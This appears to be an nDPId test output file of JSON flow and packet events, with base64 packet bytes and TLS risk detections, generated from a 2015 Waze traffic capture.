+01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":428,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587879850,"flow_last_seen":1435587880568,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3491,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1435587880568,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880576,"flow_last_seen":1435587880576,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880576,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1435587880576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880576,"pkt":"ABoRAAACABoRAAABCABFAAA0U4FAAEAG6tYKECWdyKAEH6vXAFAtnZBdDlnt+YARAVu2DAAAAQEICgAIcK6K\/GDA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1435587880577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880577,"pkt":"ABoRAAACABoRAAABCABFAAAodUFAABAG+SLIoAQfChAlnQBQq9cOWe35LZ2QXlAQ\/\/9M8gAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1435587880577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880577,"pkt":"ABoRAAACABoRAAABCABFAAAodUJAABAG+SHIoAQfChAlnQBQq9cOWe35LZ2QXlAR\/\/9M8QAA"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880577,"flow_last_seen":1435587880577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880577,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":46473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1435587880577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880577,"pkt":"ABoRAAACABoRAAABCABFAAA0OqdAAEAGA58KECWdyKAEMbWJAFDzNuhArgf0IIARAVuhgQAAAQEICgAIcK4TbB\/F"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1435587880578,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880578,"pkt":"ABoRAAACABoRAAABCABFAAAodUNAABAG+Q7IoAQxChAlnQBQtYmuB\/Qg8zboQVAQ\/\/9\/2wAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1435587880578,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880578,"pkt":"ABoRAAACABoRAAABCABFAAAodURAABAG+Q3IoAQxChAlnQBQtYmuB\/Qg8zboQVAR\/\/9\/2gAA"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":438,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880578,"flow_last_seen":1435587880578,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880578,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":41823,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1435587880578,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880578,"pkt":"ABoRAAACABoRAAABCABFAAA04rRAAEAGW5EKECWdyKAEMaNfAFDGgz5oQX0A9YARAVvp7QAAAQEICgAIcK4TbB\/F"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1435587880579,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880579,"pkt":"ABoRAAACABoRAAABCABFAAAodUVAABAG+QzIoAQxChAlnQBQo19BfQD1xoM+aVAQ\/\/\/IRwAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1435587880579,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880579,"pkt":"ABoRAAACABoRAAABCABFAAAodUZAABAG+QvIoAQxChAlnQBQo19BfQD1xoM+aVAR\/\/\/IRgAA"} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880579,"flow_last_seen":1435587880579,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880579,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":45169,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1435587880579,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880579,"pkt":"ABoRAAACABoRAAABCABFAAAohIxAAEAG3tQKCAAByKAExrBxAFBvlik9kGnb21AR\/\/8iigAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1435587880580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880580,"pkt":"ABoRAAACABoRAAABCABFAAAodUdAABAGHhrIoATGCggAAQBQsHGQadvbb5YpPlAQ\/\/8iigAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1435587880580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880580,"pkt":"ABoRAAACABoRAAABCABFAAAodUhAABAGHhnIoATGCggAAQBQsHGQadvbb5YpPlAR\/\/8iiQAA"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880580,"flow_last_seen":1435587880580,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880580,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52953,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1435587880580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880580,"pkt":"ABoRAAACABoRAAABCABFAAA0VK5AAEAG6ZcKECWdyKAEMc7ZAFAfHIxhueqe64ARAVv9kwAAAQEICgAIcK4TbCOv"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1435587880580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880580,"pkt":"ABoRAAACABoRAAABCABFAAAodUlAABAG+QjIoAQxChAlnQBQztm56p7rHxyMYlAQ\/\/\/f1wAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1435587880581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880581,"pkt":"ABoRAAACABoRAAABCABFAAAodUpAABAG+QfIoAQxChAlnQBQztm56p7rHxyMYlAR\/\/\/f1gAA"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880581,"flow_last_seen":1435587880581,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880581,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52746,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1435587880581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880581,"pkt":"ABoRAAACABoRAAABCABFAAA02RhAAEAGZS0KECWdyKAEMc4KAFB1GwfcXT3HdoARAVthCwAAAQEICgAIcK4TbCOv"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1435587880582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880582,"pkt":"ABoRAAACABoRAAABCABFAAAodUtAABAG+QbIoAQxChAlnQBQzgpdPcd2dRsH3VAQ\/\/9DTwAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1435587880582,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880582,"pkt":"ABoRAAACABoRAAABCABFAAAodUxAABAG+QXIoAQxChAlnQBQzgpdPcd2dRsH3VAR\/\/9DTgAA"} +00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880583,"flow_last_seen":1435587880583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880583,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60574,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1435587880583,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880583,"pkt":"ABoRAAACABoRAAABCABFAAAo9fdAAEAGbf4KCAAByKAEMeyeAFAiBCaW3fvegVAR\/\/\/m8gAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1435587880586,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880586,"pkt":"ABoRAAACABoRAAABCABFAAAodU1AABAGHqnIoAQxCggAAQBQ7J7d+96BIgQml1AQ\/\/\/m8gAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1435587880587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880587,"pkt":"ABoRAAACABoRAAABCABFAAAodU5AABAGHqjIoAQxCggAAQBQ7J7d+96BIgQml1AR\/\/\/m8QAA"} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":457,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880587,"flow_last_seen":1435587880587,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880587,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":43089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1435587880587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880587,"pkt":"ABoRAAACABoRAAABCABFAAAoE7JAAEAGT68KCAAByKAExqhRAbtmrsLcmVFRdFAR\/\/8aBwAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1435587880588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880588,"pkt":"ABoRAAACABoRAAABCABFAAAodU9AABAGHhLIoATGCggAAQG7qFGZUVF0Zq7C3VAQ\/\/8aBwAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1435587880588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880588,"pkt":"ABoRAAACABoRAAABCABFAAAodVBAABAGHhHIoATGCggAAQG7qFGZUVF0Zq7C3VAR\/\/8aBgAA"} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880589,"flow_last_seen":1435587880589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880589,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1435587880589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880589,"pkt":"ABoRAAACABoRAAABCABFAAAoS15AAEAGGJgKCAAByKAEMew\/Abump6BqWVh1BVAR\/\/\/VjgAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1435587880589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880589,"pkt":"ABoRAAACABoRAAABCABFAAAodVJAABAGHqTIoAQxCggAAQG77D9ZWHUFpqega1AQ\/\/\/VjgAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1435587880589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880589,"pkt":"ABoRAAACABoRAAABCABFAAAodVNAABAGHqPIoAQxCggAAQG77D9ZWHUFpqega1AR\/\/\/VjQAA"} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":532,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587894241,"flow_last_seen":1435587894241,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587894241,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1435587894241,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587894241,"pkt":"ABoRAAACABoRAAABCABFAAA87+5AAEAGZNsKCAABLjOtto0mAbvDfJnqAAAAAKAC\/\/\/\/twAAAgQFtAQCCAoACHYEAAAAAAEDAwg="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1435587894244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587894244,"pkt":"ABoRAAACABoRAAABCABFAAAodXFAABAGD20uM622CggAAQG7jSY8g2YVw3yZ61AS\/\/86\/gAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1435587894244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587894244,"pkt":"ABoRAAACABoRAAABCABFAAAo7+9AAEAGZO4KCAABLjOtto0mAbvDfJnrPINmFlAQ\/\/86\/wAA"} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587894241,"flow_last_seen":1435587894323,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587894323,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":537,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587894241,"flow_last_seen":1435587894759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1435587894759,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587898822,"flow_last_seen":1435587898822,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587898822,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1435587898822,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587898822,"pkt":"ABoRAAACABoRAAABCABFAAA8qMZAAEAGamAKCAABbKiw5MaMAbuJft8IAAAAAKAC\/\/93xAAAAgQFtAQCCAoACHfOAAAAAAEDAwg="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1435587898824,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587898824,"pkt":"ABoRAAACABoRAAABCABFAAAodXtAABAGzb9sqLDkCggAAQG7xox2gSD3iX7fCVAS\/\/+\/9AAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1435587898824,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587898824,"pkt":"ABoRAAACABoRAAABCABFAAAoqMdAAEAGanMKCAABbKiw5MaMAbuJft8JdoEg+FAQ\/\/+\/9QAA"} 